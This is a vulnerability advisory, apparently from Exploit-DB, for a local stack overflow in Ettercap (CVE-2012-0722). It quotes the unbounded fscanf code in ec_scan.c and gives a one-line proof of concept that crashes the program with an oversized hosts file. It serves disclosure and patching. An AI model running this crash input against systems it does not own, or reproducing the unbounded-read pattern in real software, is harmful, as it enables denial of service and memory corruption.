Ettercap Stack overflow (CWE-121)

vendor:

Ettercap

by:

Sajjad Pourali

3.3

CVSS

LOW

Stack overflow

121

CWE

Product Name: Ettercap

Affected Version From: 0.7.4 and earlier

Affected Version To: 0.7.5.1

Patch Exists: YES

Related CWE: CVE-2012-0722

CPE: ettercap

Metasploit:

Other Scripts:

Platforms Tested:

2012

Ettercap Stack overflow (CWE-121)

The Ettercap software version 0.7.5.1 and earlier is vulnerable to a stack overflow vulnerability, as identified by CWE-121. This vulnerability allows an attacker to execute arbitrary code or cause a denial of service (DoS) by sending a specially crafted input to the affected software. The vulnerability exists in the `ec_scan.c` file, specifically in the `fscanf` function call at line 633-635. By sending a maliciously crafted input, an attacker can trigger a stack overflow and potentially gain control over the affected system. This vulnerability has been assigned CVE-2012-0722.

Mitigation:

To mitigate this vulnerability, users are advised to apply the provided patch. The patch can be downloaded from the vendor's website at http://www.securation.com/files/2013/01/ec.patch.

Source

Exploit-DB raw data:

Title: Ettercap Stack overflow (CWE-121)
References: CVE-2012-0722
Discovered by: Sajjad Pourali
Vendor: http://www.ettercap.sourceforge.net/
Vendor contact: 13-01-01 21:20 UTC (No response)
Solution: Using the patch
Patch: http://www.securation.com/files/2013/01/ec.patch

Local: Yes
Remote: No
Impact: low

Affected:
 - ettercap 0.7.5.1
 - ettercap 0.7.5
 - ettercap 0.7.4 and earlier
Not affected:
 - ettercap 0.7.4.1

---

Trace vulnerable place:

./include/ec_inet.h:27-44
enum {
   NS_IN6ADDRSZ            = 16,
   NS_INT16SZ              = 2,

   ETH_ADDR_LEN            = 6,
   TR_ADDR_LEN             = 6,
   FDDI_ADDR_LEN           = 6,
   MEDIA_ADDR_LEN          = 6,

   IP_ADDR_LEN             = 4,
   IP6_ADDR_LEN            = 16,
   MAX_IP_ADDR_LEN         = IP6_ADDR_LEN,

   ETH_ASCII_ADDR_LEN      = sizeof("ff:ff:ff:ff:ff:ff")+1,
   IP_ASCII_ADDR_LEN       = sizeof("255.255.255.255")+1,
   IP6_ASCII_ADDR_LEN      = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,
   MAX_ASCII_ADDR_LEN      = IP6_ASCII_ADDR_LEN,
};

./include/ec_resolv.h:42
#define MAX_HOSTNAME_LEN   64

./src/ec_scan.c:610-614
char ip[MAX_ASCII_ADDR_LEN];
char mac[ETH_ASCII_ADDR_LEN];
char name[MAX_HOSTNAME_LEN];


./src/ec_scan.c:633-635
if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
         *ip == '#' || *mac == '#' || *name == '#')
         continue;

---

PoC:

sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow

---

 + Sajjad Pourali
 + http://www.securation.com
 + Contact: sajjad[at]securation.com